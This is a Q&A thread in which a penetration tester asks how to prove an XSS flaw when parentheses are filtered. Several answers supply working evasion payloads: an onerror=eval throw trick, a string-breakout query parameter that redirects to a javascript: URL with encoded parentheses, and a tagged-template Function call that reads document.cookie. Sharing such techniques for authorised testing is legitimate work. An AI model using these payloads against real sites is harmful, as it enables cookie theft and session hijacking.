# parentheses alternatives in JS , if any?

Tags: javascript, xss

I have found that Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like `alert(document.cookie)` will be rejected because of parentheses. I can get XSS using `` alert `xss` `` but I my client requires a proof of being able to access the DOM.

In other words, How can I `alert(document.cookie)` without parentheses , are there any alternatives?

Thanks!

Comment: There are no alternatives for a *method call*. However through the careful application of an implicit eval there does not need for parenthesis to appear in source code - and not all code requires parenthesis to do 'interesting' things. I'm not sure how the conclusion relates to XSS though..

Comment: [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php?title=XSS_Filter_Evasion_Cheat_Sheet) includes a number of techniques including ones that avoid parenthesis (certain conditions apply).

Answer (score 6, accepted):

`document.body.innerHTML=document.cookie` will display the cookies on the page itself.

Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute *any* arbitrary code is a liability.

Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:

```html
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>

<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">
```

Answer (score 0):

This is another solution that worked for me:

```
<script>
var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';
</script>
```

The payload would be:

```
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
```

@tcooc answer is also working.

Answer (score 0):

This works without using **=** also

````
<script>Function`X${alert`${document.cookie}`}```</script>
````